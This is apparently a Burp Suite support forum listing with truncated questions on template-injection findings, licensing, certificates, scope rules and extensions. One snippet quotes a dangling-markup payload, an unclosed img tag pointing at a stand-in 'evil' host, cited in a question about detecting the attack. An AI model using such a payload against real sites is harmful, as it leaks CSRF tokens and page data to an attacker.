How Do I?
AngularJS - Client-Side Template Injection
Hello - I'm testing a web app that is using AngularJS v1.3.11. Burp has flagged multiple high risk client-side template injection issues with a confidence of firm. I'm trying to figure out if this is a false positive or something I need to report. Essentially, Burp is flagging that it is possible to inject arbitrary expressions into the client template. An example would be where user...
2 Agent Answers | 5 Community Answers | Apr 05, 2017 09:19PM UTC
Does Burp Collaborator test for "dangling markup" vulnerabilities?
This article on GitHub (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email ) outlines an attack where an attacker injects an unclosed img tag <img src='https://some-evil-site.com/log_csrf?html= which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data. Question, d...
1 Agent Answer | 0 Community Answers | Apr 03, 2017 10:55PM UTC
Interception turned off upon starting
Hello, I would like to ask you how should I save (and load) a Burp Suite project so that on start, upon loading from a .burp file, interception will be turned off? Thanks.
1 Agent Answer | 1 Community Answer | Apr 03, 2017 02:16PM UTC
Since iOS 10 can't trust Burp anymore, recommended alternatives?
Since iOS 10 can no longer really "trust" the Burp Suite certificate, does anyone have any alternatives that are free? While it shows up as trusted in iPhone, it still marks it as not secure when browsing to a site that uses the trusted Burp certificate. I saw someone mention using a wildcard cert, but Let's Encrypt doesn't support it. Just trying to figure out an alternative to being able ...
1 Agent Answer | 1 Community Answer | Mar 31, 2017 03:57PM UTC
I am not able to activate my Burp license after formatting my laptop.
My laptop had Windows 10 Pro with Burp installed. After formatting I installed Windows 10 Single Language and tried to activate Burp but no luck, it says "activation failed no more activation for this license". But Burp was activated on this PC. Kindly suggest what to do in this case. Is there any way that I can activate Burp on my PC? Is my license going to waste?
1 Agent Answer | 0 Community Answers | Mar 31, 2017 05:40AM UTC
Burp shows super tiny window & letters
Hi, When opening Burp on my Dell 5510 it won't maximize and it shows a tiny window & letters. What settings should I change to see Burp at normal size and not in miniature? Also, I am not able to install any new updates as it is freezing at 100% download. The download will not complete.
2 Agent Answers | 1 Community Answer | Mar 31, 2017 02:31AM UTC
Change part of a URL in a project
Hi, We have extensively done browsing to record as many URLs as possible for a particular website, and tested that version, which resides in: www.mydomain.com/uat/application. Now we've moved the same website to another URL, and we access that through: www.mydomain.com/preprod/application. The website, hyperlinks, pages, and applications are the same, but they are placed in another a...
1 Agent Answer | 0 Community Answers | Mar 28, 2017 06:20PM UTC
Hello, I have a corporate license for Burp Suite Professional. Which product do I need to download to activate it? Trial version of Burp Suite Professional? Will I be able to activate Pro license on it? Or just download Free edition, and activate license? Thank you.
2 Agent Answers | 1 Community Answer | Mar 28, 2017 10:49AM UTC
Manipulate Header Request Parameter in Extension
Hi, I want to build up an automatic test system for a JSON API. My plan is as follows: Initially I get a fresh login token. Then I get into the proxy (processProxyMessage) and replace the token with my freshly acquired login token. My problem is that I cannot update the content of my request. The token just doesn't change. Pseudocode: public void processProxyMessage(boolean messageIsRe...
1 Agent Answer | 0 Community Answers | Mar 27, 2017 04:09PM UTC
SiteMap & Spider Out-Of-Scope Entries
Hi, I have an application that I'm testing with thousands, maybe more, of URLs like example.com/[0-9]+ and I don't want to go through them all, not in Sitemap/Proxy/Spider, so first I set up a rule in Scope Exclude with ^example\.com$ ^/[0-9]+.* and I have these settings in: Spider/Control/Spider Scope: Use Suite Scope Project Options/Connections/Out-Of-Scope: Use Suite Scope and Drop ...
1 Agent Answer | 0 Community Answers | Mar 26, 2017 10:01PM UTC